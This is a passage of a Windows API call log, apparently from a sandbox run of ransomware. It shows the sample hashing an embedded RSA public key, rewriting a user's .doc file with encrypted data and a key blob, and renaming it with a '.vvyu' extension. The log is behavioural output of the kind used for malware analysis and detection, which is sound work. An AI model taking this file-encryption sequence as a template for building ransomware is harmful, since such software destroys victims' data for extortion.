0x2900000 [0193.947] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x38ed, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0193.947] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0193.949] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0193.949] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0193.949] SetFilePointer (in: hFile=0x568, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0193.949] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x3913, lpOverlapped=0x0) returned 1 [0193.950] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.950] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2e912b0 [0193.950] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.950] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.950] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0193.951] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0193.951] CryptHashData (hHash=0x2cfe140, pbData=0x2e912b0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0193.951] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0193.951] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0193.951] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0193.951] GetLastError () returned 0x0 [0193.951] CryptDestroyHash (hHash=0x2cfe140) returned 1 [0193.951] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0193.952] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0193.952] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0193.952] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0193.952] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0193.952] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0193.952] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0193.952] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0193.952] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3910) returned 0x2ea2a68 [0193.952] SetFilePointer (in: hFile=0x568, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0193.952] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0193.952] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0193.953] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0193.953] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2e912b0 [0193.953] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0193.953] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0c30 [0193.953] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x6572b8 [0193.953] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0c78 [0193.953] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x657228 [0193.953] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x657210 [0193.953] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x6573d8 [0193.953] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x657270 [0193.953] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0193.953] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0193.953] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aa80 [0193.953] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea6380 [0193.953] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x657210 | out: hHeap=0x620000) returned 1 [0193.953] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x657270 | out: hHeap=0x620000) returned 1 [0193.953] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6573d8 | out: hHeap=0x620000) returned 1 [0193.954] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0193.954] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6380 | out: hHeap=0x620000) returned 1 [0193.954] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x6573d8 [0193.954] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ac0 [0193.954] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x657270 [0193.954] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85da8 [0193.954] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x657210 [0193.955] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ad0 [0193.955] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99d28 [0193.955] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0193.955] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0193.955] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0193.955] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c998c8 [0193.955] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d88 [0193.955] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0193.955] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0193.955] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x657270 | out: hHeap=0x620000) returned 1 [0193.955] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0193.955] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x657210 | out: hHeap=0x620000) returned 1 [0193.955] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0193.956] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0193.956] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6573d8 | out: hHeap=0x620000) returned 1 [0193.956] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0193.956] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0193.957] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aa80 | out: hHeap=0x620000) returned 1 [0193.957] GetCurrentThreadId () returned 0x66c [0193.957] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0193.957] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2e9f890 [0193.957] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd95d8 [0193.957] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0193.957] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e93a80 [0193.957] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0193.957] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0193.957] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0193.957] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0193.958] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0193.958] GetCurrentThreadId () returned 0x66c [0193.958] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0193.958] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0193.958] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2e914a8 [0193.958] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0193.958] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0193.959] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0193.959] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0193.959] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e914a8 | out: hHeap=0x620000) returned 1 [0193.959] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0193.959] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0193.959] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccaa80 [0193.959] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0193.959] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0193.959] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0193.959] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x6573d8 [0193.959] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0193.959] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0193.959] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0193.959] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0193.960] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0193.960] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0193.960] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0193.960] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0193.960] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x657210 [0193.960] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0193.960] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0193.960] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0193.960] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0193.960] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0193.960] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b10 [0193.960] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0193.960] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x657270 [0193.960] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b10 | out: hHeap=0x620000) returned 1 [0193.960] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85da8 [0193.960] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0193.960] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x657300 [0193.960] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0193.960] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x6572d0 [0193.960] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0193.960] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ae0 [0193.960] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0193.960] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea1a80 [0193.960] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0193.960] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea1a98 [0193.961] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0193.961] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea1ab0 [0193.961] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1a98 | out: hHeap=0x620000) returned 1 [0193.961] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea1a98 [0193.961] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1a80 | out: hHeap=0x620000) returned 1 [0193.961] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ab0 [0193.961] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0193.961] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0193.961] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0193.961] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0193.961] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x657210 | out: hHeap=0x620000) returned 1 [0193.961] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x657210 [0193.961] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0193.961] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2ea6380 [0193.961] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6573d8 | out: hHeap=0x620000) returned 1 [0193.961] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99d28 [0193.961] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1ab0 | out: hHeap=0x620000) returned 1 [0193.961] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea6590 [0193.961] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0193.961] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99c10 [0193.961] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0193.961] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99af8 [0193.961] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x657210 | out: hHeap=0x620000) returned 1 [0193.962] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea67a8 [0193.962] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0193.962] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0193.962] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0193.962] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0193.963] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0193.963] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0193.963] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0193.963] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0193.964] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6590 | out: hHeap=0x620000) returned 1 [0193.964] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea67a8 | out: hHeap=0x620000) returned 1 [0193.964] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0193.965] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0193.965] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1a98 | out: hHeap=0x620000) returned 1 [0193.965] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0193.965] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6572d0 | out: hHeap=0x620000) returned 1 [0193.965] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0193.965] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x657270 | out: hHeap=0x620000) returned 1 [0193.965] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x657300 | out: hHeap=0x620000) returned 1 [0193.965] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e93a80 | out: hHeap=0x620000) returned 1 [0193.965] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0193.966] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0193.966] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x657228 | out: hHeap=0x620000) returned 1 [0193.966] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0c78 | out: hHeap=0x620000) returned 1 [0193.966] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6380 | out: hHeap=0x620000) returned 1 [0193.967] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0193.967] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0193.967] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0193.967] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0193.967] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0193.968] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0193.968] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0193.968] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0193.969] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0193.969] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0193.969] WriteFile (in: hFile=0x568, lpBuffer=0x2ea2a68*, nNumberOfBytesToWrite=0x390e, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea2a68*, lpNumberOfBytesWritten=0x312fb14*=0x390e, lpOverlapped=0x0) returned 1 [0193.969] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2a68 | out: hHeap=0x620000) returned 1 [0193.970] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x3913, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0193.970] WriteFile (in: hFile=0x568, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0193.970] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0193.970] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0193.970] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea2a68 [0193.970] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea2a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0193.970] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea2e98 [0193.970] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2a68 | out: hHeap=0x620000) returned 1 [0193.971] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0193.971] WriteFile (in: hFile=0x568, lpBuffer=0x2ea2e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea2e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0193.971] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2e98 | out: hHeap=0x620000) returned 1 [0193.971] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0193.971] WriteFile (in: hFile=0x568, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0193.971] CloseHandle (hObject=0x568) returned 1 [0193.973] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0193.973] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x2ea2a68 [0193.973] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0193.973] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\KW5J7A5.doc" (normalized: "c:\\users\\keecfmwgj\\documents\\kw5j7a5.doc"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\KW5J7A5.doc.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\kw5j7a5.doc.vvyu")) returned 1 [0193.974] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2a68 | out: hHeap=0x620000) returned 1 [0193.975] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0193.975] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0193.978] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4658 | out: hHeap=0x620000) returned 1 [0193.978] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd38bdf0, ftCreationTime.dwHighDateTime=0x1d897ef, ftLastAccessTime.dwLowDateTime=0x880cd7f0, ftLastAccessTime.dwHighDateTime=0x1d8a05f, ftLastWriteTime.dwLowDateTime=0x880cd7f0, ftLastWriteTime.dwHighDateTime=0x1d8a05f, nFileSizeHigh=0x0, 